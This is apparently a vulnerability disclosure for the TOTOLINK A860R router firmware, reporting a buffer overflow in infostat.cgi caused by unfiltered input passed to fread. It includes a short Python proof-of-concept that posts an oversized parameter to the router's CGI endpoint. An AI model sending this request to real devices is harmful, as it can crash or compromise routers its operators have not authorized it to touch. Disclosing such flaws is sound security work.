Skip to content

Latest commit

 

History

History
19 lines (14 loc) · 616 Bytes

1.md

File metadata and controls

19 lines (14 loc) · 616 Bytes

Firmware:

TOTOLINK:A860R V4.1.2cu.5182_B20201027

http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=62&ids=36

Detail:

Parameters in infostat.cgi are not filtered, causing a buffer overflow vulnerability

CZ}53``7N)N5EZ{Y6JDUJ(L

The fread function copies data directly to the V11 register without filtering, causing a buffer overflow

poc:

import requests
data = {'a':'a'*0x4000}
res = requests.post("http://192.168.0.1/cgi-bin/infostat.cgi", data=data)
print(res.content)